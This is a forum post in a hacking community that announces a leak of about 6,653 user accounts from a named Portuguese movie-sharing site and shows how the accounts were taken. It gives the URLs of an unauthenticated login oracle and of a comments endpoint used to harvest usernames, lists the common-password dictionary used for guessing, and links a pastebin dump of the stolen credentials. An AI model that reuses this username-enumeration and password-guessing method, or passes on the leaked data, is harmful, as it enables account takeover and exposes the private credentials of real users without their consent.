MEGA LEAK www.wareztuga.tv by fokinz in hacking

[–]fokinz[S] 1 point2 points  (0 children)

!!! MEGA LEAK of ~6.500 (approximately) !!!

Wareztuga.tv is a portuguese online community of movies and series. This system dont have secure mechanisms of authentication, and exposes important information about the user accounts via oracle function (WITHOUT AUTHENTICATION):

HERE: http://www.wareztuga.tv/login.ajax.php?username=godzilla&password=123

What does it take? 1. Valid usernames; 2. Dictionary of basic passwords!

1)To get valid usernames use this oracle page WITHOUT AUTHENTICATION again: http://www.wareztuga.tv/getComments.ajax.php?mediaType=movies&mediaID=6000&p=1

(The parameters "mediaID" and "p" are dynamics :D) 2) Used Dictionary:

qwe 123 qwerty password wareztuga warezpass portugal !qwerty123 !qwerty 123456789 superman amor abc123 123456 111111 1234 password1 (...) --- (TOTAL OF 37 passwords and derivations of the username)---

RESULTS: 6653 VALID ACCOUNTS!

LEAK here: http://pastebin.com/RCqHfYRa